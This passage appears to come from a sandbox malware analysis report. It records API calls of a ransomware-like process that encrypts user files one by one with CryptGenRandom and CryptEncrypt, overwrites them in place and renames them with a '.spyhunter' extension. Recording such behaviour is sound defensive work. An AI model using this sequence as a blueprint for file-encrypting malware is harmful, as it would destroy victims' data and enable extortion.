(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.spyhunter")) returned 1 [0138.545] GetProcessHeap () returned 0x2c0000 [0138.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.545] GetProcessHeap () returned 0x2c0000 [0138.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.545] GetProcessHeap () returned 0x2c0000 [0138.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbde40 | out: hHeap=0x2c0000) returned 1 [0138.547] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f170 | out: pbBuffer=0x270f170) returned 1 [0138.547] GetProcessHeap () returned 0x2c0000 [0138.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.547] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f168*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f168*=0x30) returned 1 [0138.547] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0138.547] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0138.547] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0138.547] GetProcessHeap () returned 0x2c0000 [0138.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.548] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f12c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f12c*=0x3fc, lpOverlapped=0x0) returned 1 [0138.595] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.595] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x270f12c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f12c*=0x3fc, lpOverlapped=0x0) returned 1 [0138.596] GetProcessHeap () returned 0x2c0000 [0138.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.596] WriteFile (in: hFile=0x158, lpBuffer=0x270f16c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f12c, lpOverlapped=0x0 | out: lpBuffer=0x270f16c*, lpNumberOfBytesWritten=0x270f12c*=0x4, lpOverlapped=0x0) returned 1 [0138.596] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f12c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f12c*=0x30, lpOverlapped=0x0) returned 1 [0138.596] CloseHandle (hObject=0x158) returned 1 [0138.596] GetProcessHeap () returned 0x2c0000 [0138.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0138.597] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.spyhunter") returned 145 [0138.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\08_Video_rated_at_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\08_video_rated_at_4_or_5_stars.wpl.spyhunter")) returned 1 [0138.597] GetProcessHeap () returned 0x2c0000 [0138.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0138.597] GetProcessHeap () returned 0x2c0000 [0138.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.597] GetProcessHeap () returned 0x2c0000 [0138.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4290 | out: hHeap=0x2c0000) returned 1 [0138.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f168 | out: pbBuffer=0x270f168) returned 1 [0138.599] GetProcessHeap () returned 0x2c0000 [0138.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0138.599] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f160*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f160*=0x30) returned 1 [0138.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0138.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat") returned 74 [0138.599] StrStrW (lpFirst="thumbs.dat", lpSrch=".txt") returned 0x0 [0138.600] GetProcessHeap () returned 0x2c0000 [0138.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.600] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f124, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f124*=0x2800, lpOverlapped=0x0) returned 1 [0138.745] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.745] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f124, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f124*=0x2800, lpOverlapped=0x0) returned 1 [0138.745] GetProcessHeap () returned 0x2c0000 [0138.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.745] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.745] WriteFile (in: hFile=0x158, lpBuffer=0x270f164*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f124, lpOverlapped=0x0 | out: lpBuffer=0x270f164*, lpNumberOfBytesWritten=0x270f124*=0x4, lpOverlapped=0x0) returned 1 [0138.986] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f124, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f124*=0x30, lpOverlapped=0x0) returned 1 [0138.986] CloseHandle (hObject=0x158) returned 1 [0138.986] GetProcessHeap () returned 0x2c0000 [0138.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.986] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.spyhunter") returned 84 [0138.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat.spyhunter")) returned 1 [0139.026] GetProcessHeap () returned 0x2c0000 [0139.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.027] GetProcessHeap () returned 0x2c0000 [0139.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.027] GetProcessHeap () returned 0x2c0000 [0139.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4a18 | out: hHeap=0x2c0000) returned 1 [0139.029] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f160 | out: pbBuffer=0x270f160) returned 1 [0139.029] GetProcessHeap () returned 0x2c0000 [0139.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.029] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f158*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f158*=0x30) returned 1 [0139.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0139.032] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 88 [0139.032] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".txt") returned 0x0 [0139.033] GetProcessHeap () returned 0x2c0000 [0139.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.033] ReadFile (in: hFile=0x158, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f11c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f11c*=0x27cf, lpOverlapped=0x0) returned 1 [0139.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.051] WriteFile (in: hFile=0x158, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x27cf, lpNumberOfBytesWritten=0x270f11c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f11c*=0x27cf, lpOverlapped=0x0) returned 1 [0139.051] GetProcessHeap () returned 0x2c0000 [0139.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.051] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.051] WriteFile (in: hFile=0x158, lpBuffer=0x270f15c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f11c, lpOverlapped=0x0 | out: lpBuffer=0x270f15c*, lpNumberOfBytesWritten=0x270f11c*=0x4, lpOverlapped=0x0) returned 1 [0139.051] WriteFile (in: hFile=0x158, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f11c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f11c*=0x30, lpOverlapped=0x0) returned 1 [0139.051] CloseHandle (hObject=0x158) returned 1 [0139.070] GetProcessHeap () returned 0x2c0000 [0139.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3009ed8 [0139.071] wnsprintfW (in: pszDest=0x3009ed8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.spyhunter") returned 98 [0139.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.spyhunter")) returned 1 [0139.177] GetProcessHeap () returned 0x2c0000 [0139.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3009ed8 | out: hHeap=0x2c0000) returned 1 [0139.177] GetProcessHeap () returned 0x2c0000 [0139.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.177] GetProcessHeap () returned 0x2c0000 [0139.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45f28 | out: hHeap=0x2c0000) returned 1 [0139.178] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f158 | out: pbBuffer=0x270f158) returned 1 [0139.178] GetProcessHeap () returned 0x2c0000 [0139.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.178] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f150*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f150*=0x30) returned 1 [0139.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_") returned 107 [0139.179] StrStrW (lpFirst="_CACHE_MAP_", lpSrch=".txt") returned 0x0 [0139.179] GetProcessHeap () returned 0x2c0000 [0139.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.179] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f114, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f114*=0x2114, lpOverlapped=0x0) returned 1 [0139.200] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.200] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2114, lpNumberOfBytesWritten=0x270f114, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f114*=0x2114, lpOverlapped=0x0) returned 1 [0139.200] GetProcessHeap () returned 0x2c0000 [0139.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.201] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.201] WriteFile (in: hFile=0xb4, lpBuffer=0x270f154*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f114, lpOverlapped=0x0 | out: lpBuffer=0x270f154*, lpNumberOfBytesWritten=0x270f114*=0x4, lpOverlapped=0x0) returned 1 [0139.201] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f114, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f114*=0x30, lpOverlapped=0x0) returned 1 [0139.201] CloseHandle (hObject=0xb4) returned 1 [0139.201] GetProcessHeap () returned 0x2c0000 [0139.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.201] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.spyhunter") returned 117 [0139.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_.spyhunter")) returned 1 [0139.202] GetProcessHeap () returned 0x2c0000 [0139.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.202] GetProcessHeap () returned 0x2c0000 [0139.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.202] GetProcessHeap () returned 0x2c0000 [0139.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbfbb0 | out: hHeap=0x2c0000) returned 1 [0139.204] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f150 | out: pbBuffer=0x270f150) returned 1 [0139.204] GetProcessHeap () returned 0x2c0000 [0139.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.204] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f148*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f148*=0x30) returned 1 [0139.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0139.204] StrStrW (lpFirst="test-phish-simple.sbstore", lpSrch=".txt") returned 0x0 [0139.205] GetProcessHeap () returned 0x2c0000 [0139.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.205] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f10c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f10c*=0xe8, lpOverlapped=0x0) returned 1 [0139.208] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.208] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x270f10c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f10c*=0xe8, lpOverlapped=0x0) returned 1 [0139.209] GetProcessHeap () returned 0x2c0000 [0139.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.209] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.209] WriteFile (in: hFile=0xb4, lpBuffer=0x270f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f10c, lpOverlapped=0x0 | out: lpBuffer=0x270f14c*, lpNumberOfBytesWritten=0x270f10c*=0x4, lpOverlapped=0x0) returned 1 [0139.209] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f10c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f10c*=0x30, lpOverlapped=0x0) returned 1 [0139.209] CloseHandle (hObject=0xb4) returned 1 [0139.209] GetProcessHeap () returned 0x2c0000 [0139.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.209] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.spyhunter") returned 138 [0139.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.spyhunter")) returned 1 [0139.210] GetProcessHeap () returned 0x2c0000 [0139.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.210] GetProcessHeap () returned 0x2c0000 [0139.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0139.210] GetProcessHeap () returned 0x2c0000 [0139.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc47f0 | out: hHeap=0x2c0000) returned 1 [0139.210] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f148 | out: pbBuffer=0x270f148) returned 1 [0139.210] GetProcessHeap () returned 0x2c0000 [0139.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0139.210] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f140*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f140*=0x30) returned 1 [0139.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.211] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0139.211] StrStrW (lpFirst="test-phish-simple.pset", lpSrch=".txt") returned 0x0 [0139.211] GetProcessHeap () returned 0x2c0000 [0139.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.212] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f104*=0x10, lpOverlapped=0x0) returned 1 [0139.212] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.212] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f104*=0x10, lpOverlapped=0x0) returned 1 [0139.213] GetProcessHeap () returned 0x2c0000 [0139.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.213] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.213] WriteFile (in: hFile=0xb4, lpBuffer=0x270f144*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f104, lpOverlapped=0x0 | out: lpBuffer=0x270f144*, lpNumberOfBytesWritten=0x270f104*=0x4, lpOverlapped=0x0) returned 1 [0139.213] WriteFile 